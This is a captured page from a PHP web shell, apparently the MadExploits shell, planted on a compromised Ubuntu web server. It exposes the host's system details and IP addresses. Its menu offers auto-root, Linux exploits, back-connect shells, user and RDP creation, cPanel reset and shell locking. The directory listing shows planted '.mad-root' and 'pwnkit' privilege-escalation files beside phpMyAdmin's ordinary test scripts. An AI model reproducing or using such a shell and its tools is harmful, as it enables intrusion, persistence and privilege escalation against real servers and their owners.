Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.224.184.41
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
stage /
phpmyadmin /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
end-to-end
[ DIR ]
drwxr-xr-x
javascript
[ DIR ]
drwxr-xr-x
stubs
[ DIR ]
drwxr-xr-x
test_data
[ DIR ]
drwxr-xr-x
unit
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
README.rst
2.76
KB
-rw-r--r--
bootstrap-dist.php
829
B
-rw-r--r--
bootstrap-static.php
936
B
-rw-r--r--
ci-phplint
310
B
-rwxr-xr-x
config.e2e.inc.php
276
B
-rw-r--r--
doctum-config.php
894
B
-rw-r--r--
nginx.conf
3.63
KB
-rw-r--r--
php-fpm.conf
308
B
-rw-r--r--
php.ini
71.63
KB
-rw-r--r--
phpstan-constants.php
218
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
start-local-server
1.7
KB
-rwxr-xr-x
stop-local-server
1.08
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : start-local-server
#!/bin/sh # Do not run as CGI if [ -n "$GATEWAY_INTERFACE" ] ; then echo 'Can not invoke as CGI!' exit 1 fi set -e set -x if [ "$CI_MODE" != "selenium" ] ; then echo "Not in CI_MODE=selenium" exit 0 fi # Start php-fpm + nginx in temporary dir DIR=`mktemp -d --suffix=-phpMyAdminTest` CURRENT=`pwd` # Create configuration with correct paths cp tests/nginx.conf tests/php-fpm.conf tests/php.ini $DIR/ sed -i -e "s,%DIR%,$DIR," -e "s,%ROOT%,$CURRENT," $DIR/* mkdir $DIR/sessions echo "Using temporary dir: ${DIR}" # You can define FPM_PATH to override the path for example FPM_PATH="php-fpm7.4" FPM_PATH="${FPM_PATH:-php-fpm}" # Start servers "$FPM_PATH" --fpm-config $DIR/php-fpm.conf -c $DIR/php.ini ${NGINX_PATH:-nginx} -c $DIR/nginx.conf if [ ! -z "$TESTSUITE_BROWSERSTACK_KEY" ] ; then echo "Using: BrowserStack" # Install if necessary if [ ! -f ~/browserstack/BrowserStackLocal ] ; then mkdir -p ~/browserstack cd ~/browserstack wget https://www.browserstack.com/browserstack-local/BrowserStackLocal-linux-x64.zip unzip BrowserStackLocal-linux-x64.zip fi # Start BrowserStack Local forwarder ~/browserstack/BrowserStackLocal --force-local --localIdentifier "gh-$GITHUB_ACTION" --onlyAutomate --key "$TESTSUITE_BROWSERSTACK_KEY" --daemon start elif [ -z "$SKIP_STANDALONE" ] ; then echo "Using: selenium-standalone" if [ ! -f selenium-standalone ]; then yarn global add selenium-standalone selenium-standalone install fi selenium-standalone start -- -debug > ~/selenium-standalone.logs~ 2>&1 & echo $! > ~/selenium-standalone.pid~ else echo "Using: nothing." fi echo "${DIR}" > /tmp/last_temp_dir_phpMyAdminTests
Close